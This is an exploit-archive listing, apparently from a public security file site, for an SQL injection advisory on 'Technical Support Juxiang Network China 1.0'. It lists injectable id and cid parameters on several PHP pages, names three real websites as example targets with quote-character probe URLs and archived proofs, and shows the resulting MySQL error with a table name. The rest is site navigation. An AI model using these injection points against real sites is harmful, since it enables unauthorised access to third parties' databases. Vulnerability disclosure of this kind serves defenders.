Technical Support Juxiang Network China 1.0 SQL Injection

Technical Support Juxiang Network China 1.0 SQL Injection: Posted Dec 31, 2018; Authored by KingSkrupellos; Technical Support Juxiang Network China version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 38f642bca055cb91ae9426e8b412b4577b486240a0908f709bf79885f85e92ea; Download | Favorite | View

Technical Support Juxiang Network China 1.0 SQL Injection

########################################################

# Exploit Title :  Technical Support Juxiang Network China 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages/Owners : dedaogame.com / radiantviewer.com /
feesee.com / d58.net / linkedin.com/in/juxiang-jin-77131546 /
shop1369760423327.1688.com
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
 used in an SQL Command ('SQL Injection') ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050311

########################################################

China Hangzhou City Technical Technology

Support Juxiang Network SQL Injection Vulnerability

########################################################

# Exploit : /?id=[SQL Injection]
# Exploit : /en/list.php?id=[SQL Injection]
# Exploit : /en/img_anis.php?id=[SQL Injection]
# Exploit : /en/message.php?id=[SQL Injection]
# Exploit : /en/aboutus.php?id=[SQL Injection]
# Exploit : /contents.php?id=2&cid=[SQL Injection]
# Exploit : /message.php?id=[SQL Injection]

########################################################

# Example Site =>  hzjkang.com/en/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/67pRx

# Example Site =>  atk-china.com/aboutus.php?id=1%27

 => [ Proof of Concept for SQL Injection ] => archive.is/YtoHD

# Example Site =>  hszxrz.com/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/3GHK6

########################################################

# SQL Database Error =>

PHPMyWind MySql Errori1/4

/aboutus.php
You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use near '\'' at line
1

Error sql: SELECT * FROM `hzjx_infoclass` where id=1\'

########################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
########################################################

Top Authors In Last 30 Days

Red Hat 213 files
indoushka 118 files
Ubuntu 88 files
Gentoo 33 files
Debian 25 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,107)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,890)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,615)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,777)
UNIX (9,440)
UnixWare (187)
Windows (6,676)
Other

Technical Support Juxiang Network China 1.0 SQL Injection

Technical Support Juxiang Network China 1.0 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Technical Support Juxiang Network China 1.0 SQL Injection

Share This

Technical Support Juxiang Network China 1.0 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems